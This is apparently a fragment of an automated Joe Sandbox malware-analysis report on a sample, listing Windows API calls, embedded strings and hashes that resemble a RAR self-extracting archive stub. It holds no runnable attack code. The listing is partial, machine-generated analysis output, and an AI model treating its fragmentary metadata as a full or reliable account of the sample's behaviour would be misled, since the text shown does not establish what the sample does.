                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00B9D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00B9D6ED
                                                                                                                      • Part of subcall function 00B91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B8C116,00000000,.exe,?,?,00000800,?,?,?,00B98E3C), ref: 00B91FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B9D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B9D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B9D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B9D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00B9D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BA9705
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BA9711
                                                                                                                    • _free.LIBCMT ref: 00BA971C
                                                                                                                    • _free.LIBCMT ref: 00BA9727
                                                                                                                    • _free.LIBCMT ref: 00BA9732
                                                                                                                    • _free.LIBCMT ref: 00BA973D
                                                                                                                    • _free.LIBCMT ref: 00BA9748
                                                                                                                    • _free.LIBCMT ref: 00BA9753
                                                                                                                    • _free.LIBCMT ref: 00BA975E
                                                                                                                    • _free.LIBCMT ref: 00BA976C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B86FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00B87013
                                                                                                                    • _wcslen.LIBCMT ref: 00B87084
                                                                                                                      • Part of subcall function 00B87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87AAB
                                                                                                                      • Part of subcall function 00B87A9C: GetLastError.KERNEL32 ref: 00B87AF1
                                                                                                                      • Part of subcall function 00B87A9C: CloseHandle.KERNEL32(?), ref: 00B87B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9B610
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B9B637
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B9B650
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B9B661
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00B9B66A
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B9B67E
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B9B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                    • String ID: LICENSEDLG
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C3EED02C,00000001,00000000,00000000,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FD99
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FE14
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B9FE1F
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE48
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE52
                                                                                                                    • GetLastError.KERNEL32(80070057,C3EED02C,00000001,00000000,00000000,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FE57
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE6A
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FE80
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: 8189c47f69966fecea5e45110e2c9897e0fd677656fc458377f4cfacaed630c8
                                                                                                                    • Instruction ID: 718ab3ae8c8eaea3dc9ae0252b1e236bdb01f808f91e8dc7759bf34cf4bc4abf
                                                                                                                    • Opcode Fuzzy Hash: 8189c47f69966fecea5e45110e2c9897e0fd677656fc458377f4cfacaed630c8
                                                                                                                    • Instruction Fuzzy Hash: AD41ED71A0061AAFCF109F68CC45BBEBBE8EF44B20F1042B9F515E7251DB749900C7A5
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                                    • Opcode ID: 2d4e64c00821b3dcf68daac49360ed722aada43a6fc18f6142e96996ded8ae46
                                                                                                                    • Instruction ID: 7e2f1228865171323446d3e49835b77d7ecf20be44058db083101a6a14924794
                                                                                                                    • Opcode Fuzzy Hash: 2d4e64c00821b3dcf68daac49360ed722aada43a6fc18f6142e96996ded8ae46
                                                                                                                    • Instruction Fuzzy Hash: 1D713A71A00619EFEF14EFA4CC95DAEB7F9FF48710B140699E516A72A0CB70AD01CB61
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B89387
                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B893AA
                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B893C9
                                                                                                                      • Part of subcall function 00B8C29A: _wcslen.LIBCMT ref: 00B8C2A2
                                                                                                                      • Part of subcall function 00B91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B8C116,00000000,.exe,?,?,00000800,?,?,?,00B98E3C), ref: 00B91FD1
                                                                                                                    • _swprintf.LIBCMT ref: 00B89465
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B894D4
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B89514
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: rtmp%d
                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                    • Opcode ID: d63525ed7b4a5ee1a0e7c5dc10f6d1cacc2d70491ecdef441e57fe8bc5f7e246
                                                                                                                    • Instruction ID: 4043ba36d358f3bc582b4027f4046b56ce19ef25660689961261fad302b23da7
                                                                                                                    • Opcode Fuzzy Hash: d63525ed7b4a5ee1a0e7c5dc10f6d1cacc2d70491ecdef441e57fe8bc5f7e246
                                                                                                                    • Instruction Fuzzy Hash: 074151B190025966DF21FBA0CC45EEE73FCEF55740F0848E5B649A3161EB788B89CB60
                                                                                                                    APIs
                                                                                                                    • __aulldiv.LIBCMT ref: 00B9122E
                                                                                                                      • Part of subcall function 00B8B146: GetVersionExW.KERNEL32(?), ref: 00B8B16B
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00B91251
                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00B91263
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B91274
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91284
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91294
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B912CF
                                                                                                                    • __aullrem.LIBCMT ref: 00B91379
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1247370737-0
                                                                                                                    • Opcode ID: 0524d9f79b28f6aa1a4480f805e91bf2d91749dcd5f598b03fa47499439a5a44
                                                                                                                    • Instruction ID: bb8c2f801238d91cd7141388111e779180665a86cfafec9b1d35a10d2a91d79a
                                                                                                                    • Opcode Fuzzy Hash: 0524d9f79b28f6aa1a4480f805e91bf2d91749dcd5f598b03fa47499439a5a44
                                                                                                                    • Instruction Fuzzy Hash: F541E5B1508306AFC710DF69C88496BBBF9FB88714F008A2EF596D2210E774E549DB51
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B82536
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                    • Opcode ID: cf6266c20bdb91d040b73d2ce2fc3ee253333971f155151dec8606bf036edc82
                                                                                                                    • Instruction ID: edc0d61c0443b8212af0aeb1c82eb03df4b98e7ab9c3234378231f3bd9c5ed23
                                                                                                                    • Opcode Fuzzy Hash: cf6266c20bdb91d040b73d2ce2fc3ee253333971f155151dec8606bf036edc82
                                                                                                                    • Instruction Fuzzy Hash: E5F1F6B06043419BDF15FB288495BFE7BD9AF90300F0805EDED869B2A3DB749945C7A2
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                    • Opcode ID: 5449efdb098aad7003fec5d578cba4a39ac477fd5bc321aba277f8d485804048
                                                                                                                    • Instruction ID: f03961e80c859ce49ba300632393698f10efbb167a865ab91ee8c24cb09384c6
                                                                                                                    • Opcode Fuzzy Hash: 5449efdb098aad7003fec5d578cba4a39ac477fd5bc321aba277f8d485804048
                                                                                                                    • Instruction Fuzzy Hash: E451576670072391DFB09A2D98517B673E0DFA1750F6908BFF9C1CB2D0FBA58C858261
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BAFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00BAF6CF
                                                                                                                    • __fassign.LIBCMT ref: 00BAF74A
                                                                                                                    • __fassign.LIBCMT ref: 00BAF765
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BAF78B
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00BAFE02,00000000,?,?,?,?,?,?,?,?,?,00BAFE02,00000000), ref: 00BAF7AA
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,00BAFE02,00000000,?,?,?,?,?,?,?,?,?,00BAFE02,00000000), ref: 00BAF7E3
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: e71be9f9ec46942d4e58b81965fab7a157cd38efc69b54d11319dc2362cbb27d
                                                                                                                    • Instruction ID: 15770cecba5d7d360b5d71bd1b510650cba6042443d86d2e300974af374dfdce
                                                                                                                    • Opcode Fuzzy Hash: e71be9f9ec46942d4e58b81965fab7a157cd38efc69b54d11319dc2362cbb27d
                                                                                                                    • Instruction Fuzzy Hash: 3A51A5B1D0424A9FDB10CFA8DC85AEEBBF8EF09710F1441AAE555E7251D770AA41CBA0
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BA2937
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00BA293F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BA29C8
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00BA29F3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BA2A48
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00B99EEE
                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00B99F44
                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00B99FDB
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00B99FE3
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00B99FF9
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                    • String ID: RarHtmlClassName
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BAC868: _free.LIBCMT ref: 00BAC891
                                                                                                                    • _free.LIBCMT ref: 00BAC8F2
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BAC8FD
                                                                                                                    • _free.LIBCMT ref: 00BAC908
                                                                                                                    • _free.LIBCMT ref: 00BAC95C
                                                                                                                    • _free.LIBCMT ref: 00BAC967
                                                                                                                    • _free.LIBCMT ref: 00BAC972
                                                                                                                    • _free.LIBCMT ref: 00BAC97D
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B9E669,00B9E5CC,00B9E86D), ref: 00B9E605
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B9E61B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B9E630
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    APIs
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B914C2
                                                                                                                      • Part of subcall function 00B8B146: GetVersionExW.KERNEL32(?), ref: 00B8B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B914E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B91500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B91513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91533
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00BA2AF1,00BA02FC,00B9FA34), ref: 00BA2B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BA2B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA2B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,00BA2AF1,00BA02FC,00B9FA34), ref: 00BA2B81
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00BC1030,00BA4674,00BC1030,?,?,00BA3F73,00000050,?,00BC1030,00000200), ref: 00BA97E9
                                                                                                                    • _free.LIBCMT ref: 00BA981C
                                                                                                                    • _free.LIBCMT ref: 00BA9844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00BC1030,00000200), ref: 00BA9851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00BC1030,00000200), ref: 00BA985D
                                                                                                                    • _abort.LIBCMT ref: 00BA9863
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 7a9eb64808bd97f520f3069089fe8b1587ea00ec7056a64b0a551d7a246df817
                                                                                                                    • Instruction ID: 594b439f7b65583bd6e02785d8f36b2aa0c8d7a70ce347e5dfac56c70b8f8edf
                                                                                                                    • Opcode Fuzzy Hash: 7a9eb64808bd97f520f3069089fe8b1587ea00ec7056a64b0a551d7a246df817
                                                                                                                    • Instruction Fuzzy Hash: D8F0A43614C60167C61233356C5AB5B2AE9DFD3BA1F3402B8F624971A2FF68C801A565
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 00B9DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B9DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9DC91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    • Opcode ID: 1ded835908c5331ef3d0ff657e865fbf75483eccd698a6aa69a90e47dc10146b
                                                                                                                    • Instruction ID: a5a6e8ce5bc486454d1b9d12d66e4f276556d8fdf96faa7a4ef1010a2aa43a0b
                                                                                                                    • Opcode Fuzzy Hash: 1ded835908c5331ef3d0ff657e865fbf75483eccd698a6aa69a90e47dc10146b
                                                                                                                    • Instruction Fuzzy Hash: 25F03C72A01229BBCF20ABA5DC4CEDB7FBDEF41B91B004121F50AE7051DA749646C7A0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                      • Part of subcall function 00B8B92D: _wcsrchr.LIBVCRUNTIME ref: 00B8B944
                                                                                                                    • _wcslen.LIBCMT ref: 00B8C197
                                                                                                                    • _wcslen.LIBCMT ref: 00B8C1DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    • Opcode ID: c88224a99567109455639955bc3ba53f75adf4486343cde0120df8db2e59b2b2
                                                                                                                    • Instruction ID: f217683ba578a2e4080b2f9d7414768731e21098516168b7bbe6fb26bda3ca7f
                                                                                                                    • Opcode Fuzzy Hash: c88224a99567109455639955bc3ba53f75adf4486343cde0120df8db2e59b2b2
                                                                                                                    • Instruction Fuzzy Hash: F341F3615503169ACA31BF348896E7ABBE8EF41B44F1049CEF9926B1E1EB704981C371
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00B9CE9D
                                                                                                                      • Part of subcall function 00B8B690: _wcslen.LIBCMT ref: 00B8B696
                                                                                                                    • _swprintf.LIBCMT ref: 00B9CED1
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,00BC946A), ref: 00B9CEF1
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9CFFE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: %s%s%u
                                                                                                                    • API String ID: 110358324-1360425832
                                                                                                                    • Opcode ID: 9ea6ba1da27e6fed868c7daf17f2e6960d8c1ecd3f473dd8b5dbd8ddd2fe7486
                                                                                                                    • Instruction ID: ef36596831a8737b15c667fa76105b26ca5d07aab931b0a55b05e4e50ae77939
                                                                                                                    • Opcode Fuzzy Hash: 9ea6ba1da27e6fed868c7daf17f2e6960d8c1ecd3f473dd8b5dbd8ddd2fe7486
                                                                                                                    • Instruction Fuzzy Hash: FD416CB1900658AADF25ABA1CC85FEE77FCEB05341F4080E6F909E7151EE709A84CF65
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B8A275,?,?,00000800,?,00B8A23A,?,00B8755C), ref: 00B8BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 00B8BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: e48a9c43b01514083c6ab7a83e04233beddbc2977d992a563fd2a5fe7cf3f760
                                                                                                                    • Instruction ID: aa91a7f7ba80307199ee5299e067abe250f77da3c5d933e7f4cfce2e246b59ed
                                                                                                                    • Opcode Fuzzy Hash: e48a9c43b01514083c6ab7a83e04233beddbc2977d992a563fd2a5fe7cf3f760
                                                                                                                    • Instruction Fuzzy Hash: 34415B31440216BADF21BF70CC45EEA77E9EF45790F1044E6F955A3261EBB09A90CF60
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 00B9B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B9B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B9B767
                                                                                                                      • Part of subcall function 00B9A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6D5
                                                                                                                      • Part of subcall function 00B9A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6EC
                                                                                                                      • Part of subcall function 00B9A6C2: LoadResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A703
                                                                                                                      • Part of subcall function 00B9A6C2: LockResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A712
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B9B73D,00000066), ref: 00B9A72D
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalLock.KERNEL32(00000000), ref: 00B9A73E
                                                                                                                      • Part of subcall function 00B9A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B9A762
                                                                                                                      • Part of subcall function 00B9A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B9A7A7
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00B9A7C6
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalFree.KERNEL32(00000000), ref: 00B9A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                    • Opcode ID: d1b062d9224c2f8086dd968f1a9a81a18f43d326c0c5170d73279e80ad8a7c65
                                                                                                                    • Instruction ID: 9e6000393d2250107b89aedbdbe3f400a2a8ef7d49076aa05052402502379533
                                                                                                                    • Opcode Fuzzy Hash: d1b062d9224c2f8086dd968f1a9a81a18f43d326c0c5170d73279e80ad8a7c65
                                                                                                                    • Instruction Fuzzy Hash: 0801C43650011567CF1277B46D49E7F7AFAEBC1B52F1901B1F900B7292DF258D0542A1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B9D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00B9D684
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    • Opcode ID: 39974deed2ae4ae433f4e11da39fd4b56c55224f6c3c1ed81d8607d7ef58888d
